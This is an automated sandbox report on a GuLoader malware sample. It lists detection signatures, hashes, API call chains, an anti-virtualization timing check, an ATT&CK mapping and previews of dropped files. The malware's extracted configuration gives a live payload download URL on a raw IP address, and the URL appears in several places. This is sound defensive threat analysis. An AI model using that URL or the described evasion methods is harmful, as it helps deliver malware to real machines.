Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.26603

Overview

General Information

Sample Name:SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.26603 (renamed file extension from 26603 to exe)
Analysis ID:632606
MD5:09d431a8321ec75d7ff057787c319897
SHA1:b709d7968897d774676194b9708f304a6a472086
SHA256:1be03967a615254ca0b3eba8b5aaa6b5f5c91c9f03d4fe2692b3675f93c0b26d
Tags:exesigned
Infos:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Binary contains a suspicious time stamp
Detected potential crypto function
PE / OLE file has an invalid certificate
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • cleanup
{"Payload URL": "http://2.56.57.22/MY%20AIRTEL%20TELEGRAM%20STUB_iHQdRhQNdR56.bin"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.883009053.0000000003140000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000000.00000002.883009053.0000000003140000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://2.56.57.22/MY%20AIRTEL%20TELEGRAM%20STUB_iHQdRhQNdR56.bin"}
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeReversingLabs: Detection: 21%
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\net6.0-Release\System.IO.UnmanagedMemoryStream.pdb source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.882784474.0000000002862000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmp, System.IO.UnmanagedMemoryStream.dll.0.dr
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

    Networking

    barindex
    Source: Malware configuration extractorURLs: http://2.56.57.22/MY%20AIRTEL%20TELEGRAM%20STUB_iHQdRhQNdR56.bin
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://subca.ocsp-certum.com01
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://subca.ocsp-certum.com02
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://subca.ocsp-certum.com05
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeString found in binary or memory: http://www.certum.pl/CPS0
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.882784474.0000000002862000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmp, System.IO.UnmanagedMemoryStream.dll.0.drString found in binary or memory: https://github.com/dotnet/runtime
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.882784474.0000000002862000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.UnmanagedMemoryStream.dll@ vs SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.IO.UnmanagedMemoryStream.dll@ vs SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_00406D5F0_2_00406D5F
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_72491BFF0_2_72491BFF
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeStatic PE information: invalid certificate
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeProcess Stats: CPU usage > 98%
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeReversingLabs: Detection: 21%
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeJump to behavior
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeFile created: C:\Users\user\AppData\Local\Temp\nsdEA1F.tmpJump to behavior
    Source: classification engineClassification label: mal72.troj.evad.winEXE@1/9@0/0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\net6.0-Release\System.IO.UnmanagedMemoryStream.pdb source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.882784474.0000000002862000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmp, System.IO.UnmanagedMemoryStream.dll.0.dr

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000000.00000002.883009053.0000000003140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_724930C0 push eax; ret 0_2_724930EE
    Source: System.IO.UnmanagedMemoryStream.dll.0.drStatic PE information: 0xFD78D1DD [Sat Oct 4 08:54:53 2104 UTC]
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_72491BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_72491BFF
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeFile created: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeFile created: C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeRDTSC instruction interceptor: First address: 0000000003142903 second address: 0000000003142903 instructions: 0x00000000 rdtsc 0x00000002 test dh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F9C08B788F3h 0x00000008 inc ebp 0x00000009 test ebx, edx 0x0000000b inc ebx 0x0000000c cmp cx, ax 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeAPI call chain: ExitProcess graph end nodegraph_0-4510
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeAPI call chain: ExitProcess graph end nodegraph_0-4291
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_72491BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_72491BFF
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Access Token Manipulation
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Timestomp
    LSASS Memory2
    File and Directory Discovery
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth1
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    DLL Side-Loading
    Security Account Manager13
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Obfuscated Files or Information
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe22%ReversingLabsWin32.Downloader.GuLoader
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dll0%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll0%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll3%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://subca.ocsp-certum.com050%Avira URL Cloudsafe
    http://2.56.57.22/MY%20AIRTEL%20TELEGRAM%20STUB_iHQdRhQNdR56.bin0%Avira URL Cloudsafe
    http://subca.ocsp-certum.com020%URL Reputationsafe
    http://subca.ocsp-certum.com010%URL Reputationsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://2.56.57.22/MY%20AIRTEL%20TELEGRAM%20STUB_iHQdRhQNdR56.bintrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://crl.certum.pl/ctsca2021.crl0oSecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
      high
      http://repository.certum.pl/ctnca.cer09SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
        high
        http://repository.certum.pl/ctsca2021.cer0SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
          high
          http://crl.certum.pl/ctnca.crl0kSecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
            high
            http://subca.ocsp-certum.com05SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
            • Avira URL Cloud: safe
            unknown
            http://subca.ocsp-certum.com02SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
            • URL Reputation: safe
            unknown
            http://subca.ocsp-certum.com01SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
            • URL Reputation: safe
            unknown
            http://crl.certum.pl/ctnca2.crl0lSecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
              high
              http://repository.certum.pl/ctnca2.cer09SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
                high
                http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
                  high
                  http://www.certum.pl/CPS0SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exefalse
                    high
                    https://github.com/dotnet/runtimeSecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.882784474.0000000002862000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmp, System.IO.UnmanagedMemoryStream.dll.0.drfalse
                      high
                      No contacted IP infos
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:632606
                      Start date and time: 23/05/202220:14:362022-05-23 20:14:36 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 8m 5s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.26603 (renamed file extension from 26603 to exe)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:20
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal72.troj.evad.winEXE@1/9@0/0
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 86% (good quality ratio 84.7%)
                      • Quality average: 87.7%
                      • Quality standard deviation: 21.4%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 59
                      • Number of non-executed functions: 29
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for sample files taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 23.54.113.53
                      • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information
                      No simulations
                      No context
                      No context
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dllEUR_Cert_3883774784847_CMR8494849.pdf.scr.exeGet hashmaliciousBrowse
                        SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exeGet hashmaliciousBrowse
                          SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exeGet hashmaliciousBrowse
                            FSC#U007e029872652425_9387636MIG.exeGet hashmaliciousBrowse
                              FSC#U007e029872652425_9387636MIG.exeGet hashmaliciousBrowse
                                SecuriteInfo.com.Variant.Babar.54324.15185.exeGet hashmaliciousBrowse
                                  SecuriteInfo.com.Variant.Babar.54324.15185.exeGet hashmaliciousBrowse
                                    CPfUbF38MW.exeGet hashmaliciousBrowse
                                      RFQ - 100932843 - 1000219266_MAY 2022.exeGet hashmaliciousBrowse
                                        CPfUbF38MW.exeGet hashmaliciousBrowse
                                          RFQ - 100932843 - 1000219266_MAY 2022.exeGet hashmaliciousBrowse
                                            FRT_INV_MIE29727361008_76.xlsxGet hashmaliciousBrowse
                                              FRT_INV_MIE29727361008_76.xlsxGet hashmaliciousBrowse
                                                SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.29800.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.29800.exeGet hashmaliciousBrowse
                                                    New Tender of National Electricity Company TRISTAN 02 ltd BULGARIA.exeGet hashmaliciousBrowse
                                                      72EED30398363-0983BNDJ0398763536.exeGet hashmaliciousBrowse
                                                        72EED30398363-0983BNDJ0398763536.exeGet hashmaliciousBrowse
                                                          Delivery Note DHL AWB NO0023445667 MAY 2022.exeGet hashmaliciousBrowse
                                                            Delivery Note DHL AWB NO0023445667 MAY 2022.exeGet hashmaliciousBrowse
                                                              C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dllCotizaci#U00f3n MT T-819.exeGet hashmaliciousBrowse
                                                                Cotizaci#U00f3n MT T-819.exeGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Artemis2A130FA40314.26375.exeGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Artemis2A130FA40314.26375.exeGet hashmaliciousBrowse
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                      Category:dropped
                                                                      Size (bytes):9906
                                                                      Entropy (8bit):7.910073068079041
                                                                      Encrypted:false
                                                                      SSDEEP:192:oXRlr7xecYaInXHtyMkC0RmLKZDjCYsPLcIXSZVYLuL:KRVUUIXgMkCSoe7tL
                                                                      MD5:A509568F18F3FF9C50EBFB2ACD499AA5
                                                                      SHA1:624E862D51655A6759151252963354F1520F0097
                                                                      SHA-256:5DDAFCD2247F1945099ECDE40D93F60C55D0B27F83D46B602909D55399BA635B
                                                                      SHA-512:32D090B101DC16D6A464C2D67D7870CD46E334031EE4ADE0F6255952CEB7141118C595FB8ADAF1ED04BFAB88CFAF9856A2AE5C5315AB9A9AF3E299816AEDC822
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....4.........s...*...`..Ki.#........>N....H.).T... .".S5..A..,..../W.3...|.q...1.;O...../.I......2...oT..1...Y..;....be.Y.qE~w..,..w......d.....q{ymo....D...V\K.H...F....,6.....i...9.._.......L....%....I..+.0..C\....bs.R....?....<W.3..+..._.W_...~......f.....3i...F.".z.FkX..DF......R.......?k
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):23181
                                                                      Entropy (8bit):7.990994965748802
                                                                      Encrypted:true
                                                                      SSDEEP:384:84XmU94OtQbjBI9OrBQo6+inPK/smjmMA+9dFkj80lAug7woAR/vZKoF08HQDxFd:bb6jBqPocK/smBAGdFylld79/woCzN8U
                                                                      MD5:0D972D4681D2BDD6A506A86DA5A1C85E
                                                                      SHA1:84662467F7DA4A541729A3A2174E8373F7B7BBCD
                                                                      SHA-256:6303DF45ACDC13A98D4208F1A56AE86BB051ED3E6F2EEF4650ABCEDB34AEADFA
                                                                      SHA-512:9BEB7191CCF7B75255BA17AD11BF437864EC9471DC5DBE9FC9EAD3A8692A9C8E69246DA9A679F78A426184DDB7850E4875720D20423F2B2B53ACF313626AC8DA
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:......z.U...U......[.b..BI.n.. H....D.........K:.|7.>43..wII......!..!~Fr^"Q..b:...-.....y).s....e?...:.[.v)iz..G.Q...&.I>.\..O.J...E..C.....X..8.We}R.rH.b.................Q{.I.c..P&Q.;...y..<f".u>.M....u{v+.)..........).9 ......G:.IH.V..0bsk..n.S[&$..Qpo....m.}.0LN.H!..t.(......y!.....>o...P......z{.?.e.=....b.......k$..~l7R@.....9..q_.......P...=..._.v...|..,U6....6....J1.8....$..`[...C...a$....j..f.Y.k.w..+.3:V.Z...Gs.e(.*.F....^...a.....L$,....:V=.\_.^.b/.f..c...X.......d.....i....v=.Sc..t....{8.....P4..M.2.X9...g...{.52..a%y.6..'*|8*.......!3~[.t.w...7w...M...a.j=....$u{...^..)J.J..-.I...)C7..J.p.a....#.IT.s1.0..K..#V.7.L.| .}..Z.Q\;..|.i.4..}H..!.I."?....C~.....%..n.b..E.3..P........,.}. 5{.E....p.r)..L<.*.@zu7j..7h$DV.hO."...1..8U.[....r4.I$W.U.. M.$.i+...[..kEz.t;..<A..*[E..R.}z...a.3..,.,.E...!.5...f..FC...z.........g./..KK.r..(`..'...L.LC........Ntz|..V+....}iK.;X/.},..Lp;-K......~.Ro&40..."L..Zx....X..."-=t.^!...<
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):85536
                                                                      Entropy (8bit):6.450553024590124
                                                                      Encrypted:false
                                                                      SSDEEP:768:qwz+WsmsiZUL3RDSQLefRLp3zFXs98T/ExDNnHBRXKiN9OOWp7wPkomrptIepi+s:qwz+wUjfLeLBXnLw/7gcPMIP+hO
